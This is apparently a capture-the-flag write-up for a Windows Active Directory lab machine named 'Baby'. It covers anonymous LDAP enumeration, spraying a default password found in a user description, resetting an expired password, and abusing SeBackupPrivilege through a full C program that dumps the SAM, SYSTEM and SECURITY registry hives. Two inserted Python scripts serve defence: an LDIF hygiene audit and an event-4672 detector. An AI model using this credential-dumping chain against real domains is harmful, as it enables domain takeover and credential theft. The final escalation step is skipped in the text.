🚼Baby

You will learn about LDAP enumeration and Windows privileges

IP: 10.10.117.218

Enumeration

This is a standalone machine

One thing we can do after scanning the ports is to scan LDAP with nmap's ldap scripts

nmap -n -sV --script "ldap* and not brute" 10.10.117.218 -vv -oN nmap/ldapsearch -Pn

Here we get information about the domain, the machine name, the LDAP policies and the AD users

We can check whether anonymous LDAP bind is enabled, because if it is we can enumerate the users from there

ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl" "user" | grep cn

We now have a list of the users present in the Active Directory

Now, if we remove "user" from the command (ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl"), we see more information about every user, for example the descriptions

BabyStart123! is probably the default password that was set for this account or for other accounts as well

We can create a list of users and spray the password

It did not work

But looking again at the users we also find Caroline.Robinson, who for some reason does not have a user principal name, so the command we used to list the users did not display her
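The two things the enumeration above turned up (a password left in a description attribute and an account that a UPN-based listing silently skips) are exactly what a directory owner should be checking for on their own exports. The script below is an added example, not part of this write-up: a minimal LDIF parser for ldapsearch output (entries separated by blank lines, '#' comments, single-space continuation lines, '::' base64 values) followed by a hygiene check that lists accounts by sAMAccountName rather than userPrincipalName, flags credential-looking descriptions and flags users with no UPN. The LDIF it runs on is constructed; every name, OU and value in it is made up.

```python
"""Directory hygiene check over an ldapsearch LDIF export (added example, not the
write-up's own tooling). Sample LDIF below is constructed for illustration."""
import base64
import re
from typing import Dict, List, Tuple

Entry = Dict[str, List[str]]

# Words that suggest a credential was written into a free-text attribute.
PASSWORD_HINT = re.compile(r"pass(word|wd|phrase)?|pwd", re.I)

# Constructed sample export: three users, one with a password in its description,
# one with no userPrincipalName, plus the trailing search/result block ldapsearch prints.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
#

# Jane Doe, it, example.test
dn: CN=Jane Doe,OU=it,DC=example,DC=test
objectClass: user
cn: Jane Doe
sAMAccountName: jane.doe
userPrincipalName: jane.doe@example.test

# Sam Smith, it, example.test
dn: CN=Sam Smith,OU=it,DC=example,DC=test
objectClass: user
cn: Sam Smith
sAMAccountName: sam.smith
userPrincipalName: sam.smith@example.test
description: Set initial password to ChangeMe123! and ask the user to rotate
  it on first logon

# No Upn, it, example.test
dn: CN=No Upn,OU=it,DC=example,DC=test
objectClass: user
cn: No Upn
sAMAccountName: no.upn
description:: UmVtb3RlIGFjY2Vzcw==

# search result
search: 2
result: 0 Success
"""


def unfold(text: str) -> List[str]:
    """Join LDIF continuation lines (a leading single space) onto the previous line."""
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text: str) -> List[Entry]:
    """Minimal RFC 2849 parser: blank line ends an entry, '#' lines are comments,
    'attr:: value' carries base64. Only blocks that have a dn are kept, which
    drops the 'search:/result:' trailer ldapsearch appends."""
    entries: List[Entry] = []
    current: Entry = {}
    for line in unfold(text):
        if not line.strip():
            if "dn" in current:
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, rest = line.partition(":")
        if rest.startswith(":"):
            value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
        else:
            value = rest.strip()
        current.setdefault(attr, []).append(value)
    if "dn" in current:
        entries.append(current)
    return entries


def account_names(entries: List[Entry]) -> List[str]:
    """List users by sAMAccountName, so accounts without a UPN are not missed."""
    return sorted(e["sAMAccountName"][0] for e in entries
                  if "user" in e.get("objectClass", []) and "sAMAccountName" in e)


def audit_users(entries: List[Entry]) -> List[Tuple[str, str, str]]:
    """Return (sAMAccountName, finding, detail) for each hygiene issue."""
    findings: List[Tuple[str, str, str]] = []
    for e in entries:
        if "user" not in e.get("objectClass", []):
            continue
        sam = e.get("sAMAccountName", ["<no sAMAccountName>"])[0]
        for desc in e.get("description", []):
            if PASSWORD_HINT.search(desc):
                findings.append((sam, "credential-like description", desc))
        if "userPrincipalName" not in e:
            findings.append((sam, "missing userPrincipalName", e["dn"][0]))
    return findings


if __name__ == "__main__":
    parsed = parse_ldif(SAMPLE_LDIF)
    print("accounts:", ", ".join(account_names(parsed)))
    for sam, finding, detail in audit_users(parsed):
        print(f"{sam}: {finding}: {detail}")
```

To use it on a real export, read the file ldapsearch wrote instead of SAMPLE_LDIF; the parser keeps multi-valued attributes as lists, so memberOf and similar survive intact if you extend the checks.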

Now, using crackmapexec, we see that her password needs to be changed

We can use Impacket's smbpasswd to change her password

Privilege Escalation

Now, enumerating the privileges of this user, we can see that SeBackupPrivilege and SeRestorePrivilege are enabled, probably because this user is a member of Backup Operators

With these privileges we can copy SAM and SYSTEM, but we also need ntds.dit

We can use a script that, with the diskshadow utility, exposes the C: drive as an E: drive

But for some unknown reason, after trying countless times, it did not work

So I used this code to copy the different hives to C:\Windows\Temp

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

#pragma comment(lib, "Advapi32.lib")

// Log on as the Backup Operator account and impersonate it on this thread.
// LOGON32_LOGON_NEW_CREDENTIALS keeps the local identity and only uses the
// supplied credentials for outbound network access (the remote registry below).
void MakeToken() {
    HANDLE token;
    const char username[] = "Caroline.Robinson";
    const char password[] = "Password123!";
    const char domain[] = "baby.vl";

    if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
        printf("LogonUserA: %lu\n", GetLastError());
        exit(1);
    }
    if (ImpersonateLoggedOnUser(token) == 0) {
        printf("ImpersonateLoggedOnUser: %lu\n", GetLastError());
        exit(1);
    }
}

int main()
{
    HKEY hklm;
    HKEY hkey;
    LSTATUS result;
    const char* hives[] = { "SAM", "SYSTEM", "SECURITY" };
    const char* files[] = { "C:\\windows\\temp\\sam.hive", "C:\\windows\\temp\\system.hive", "C:\\windows\\temp\\security.hive" };

    // Comment this call out if the program already runs as the Backup Operator.
    MakeToken();

    // Connect to HKLM of the domain controller through the remote registry service.
    result = RegConnectRegistryA("\\\\baby.vl", HKEY_LOCAL_MACHINE, &hklm);
    if (result != ERROR_SUCCESS) {
        printf("RegConnectRegistryA: %ld\n", result);
        exit(1);
    }
    for (int i = 0; i < 3; i++) {
        printf("Dumping %s hive to %s\n", hives[i], files[i]);
        // REG_OPTION_BACKUP_RESTORE makes the open honour SeBackupPrivilege instead of
        // the key's ACL, which is what lets a non-admin Backup Operator read these hives.
        result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
        if (result != ERROR_SUCCESS) {
            printf("RegOpenKeyExA: %ld\n", result);
            exit(1);
        }
        // RegSaveKey also requires SeBackupPrivilege; the path is written on the remote host.
        result = RegSaveKeyA(hkey, files[i], NULL);
        if (result != ERROR_SUCCESS) {
            printf("RegSaveKeyA: %ld\n", result);
            exit(1);
        }
        RegCloseKey(hkey);
    }
    RegCloseKey(hklm);
    return 0;
}
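From the defender's side, the step above leaves a trace before any hive is written: when a logon session is granted sensitive privileges, Windows logs Security event 4672 ("Special privileges assigned to new logon") and names them in its PrivilegeList field. SeBackupPrivilege or SeRestorePrivilege showing up for an account that is not an approved backup account is worth an alert, and joining the logon id to the matching 4624 tells you whether the session was a network logon. The script below is an added example, not part of this write-up; it assumes the events have been flattened to one JSON object per line with the EventData fields promoted to the top level (a common SIEM export shape, not a Windows-native one), and the events, hosts, accounts and logon ids in it are constructed.

```python
"""Detection over Security event 4672 for unexpected backup/restore privilege
grants (added example, not the write-up's own tooling). The sample events are
constructed; the flattened JSON layout is an assumption about the log pipeline."""
import json
from typing import Dict, Iterable, List

# Constructed allowlist: accounts that legitimately hold backup rights.
EXPECTED_BACKUP_ACCOUNTS = {r"EXAMPLE\svc-backup"}
WATCHED_PRIVILEGES = {"SeBackupPrivilege", "SeRestorePrivilege"}

# Constructed sample: an expected backup service account, an ordinary user that was
# just granted backup rights over a network logon, and a machine account logon.
SAMPLE_EVENTS = r"""
{"EventID": 4672, "Computer": "dc01.example.test", "SubjectUserName": "svc-backup", "SubjectDomainName": "EXAMPLE", "SubjectLogonId": "0x3e7a1", "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"}
{"EventID": 4624, "Computer": "dc01.example.test", "TargetUserName": "j.user", "TargetDomainName": "EXAMPLE", "TargetLogonId": "0x5b2c9", "LogonType": "3"}
{"EventID": 4672, "Computer": "dc01.example.test", "SubjectUserName": "j.user", "SubjectDomainName": "EXAMPLE", "SubjectLogonId": "0x5b2c9", "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeShutdownPrivilege"}
{"EventID": 4672, "Computer": "dc01.example.test", "SubjectUserName": "DC01$", "SubjectDomainName": "EXAMPLE", "SubjectLogonId": "0x3e7", "PrivilegeList": "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege"}
"""


def parse_events(lines: Iterable[str]) -> List[Dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in lines if line.strip()]


def privileges(ev: Dict) -> set:
    """PrivilegeList arrives as a whitespace-separated blob in the raw event."""
    return set(ev.get("PrivilegeList", "").split())


def detect_backup_privilege_grants(events: Iterable[Dict]) -> List[Dict[str, str]]:
    """Alert on 4672 events that grant a watched privilege to a non-allowlisted
    account, annotated with the logon type of the matching 4624 when present."""
    events = list(events)
    logon_types = {ev["TargetLogonId"]: ev.get("LogonType", "?")
                   for ev in events if ev.get("EventID") == 4624}
    alerts: List[Dict[str, str]] = []
    for ev in events:
        if ev.get("EventID") != 4672:
            continue
        hit = privileges(ev) & WATCHED_PRIVILEGES
        if not hit:
            continue
        account = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
        if account in EXPECTED_BACKUP_ACCOUNTS:
            continue
        alerts.append({
            "account": account,
            "logon_id": ev["SubjectLogonId"],
            "host": ev["Computer"],
            "logon_type": logon_types.get(ev["SubjectLogonId"], "?"),
            "privileges": ",".join(sorted(hit)),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_backup_privilege_grants(parse_events(SAMPLE_EVENTS.splitlines())):
        print(alert)
```

The allowlist is the part that needs care: it should mirror the intended membership of Backup Operators, so reviewing that group's members and trimming it is the matching hardening step, and any 4672 for an account outside it is the signal.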

From the dumped hives we get the NT hash of the machine account babydc$

Then we log in with the Administrator account and we are Domain Admin
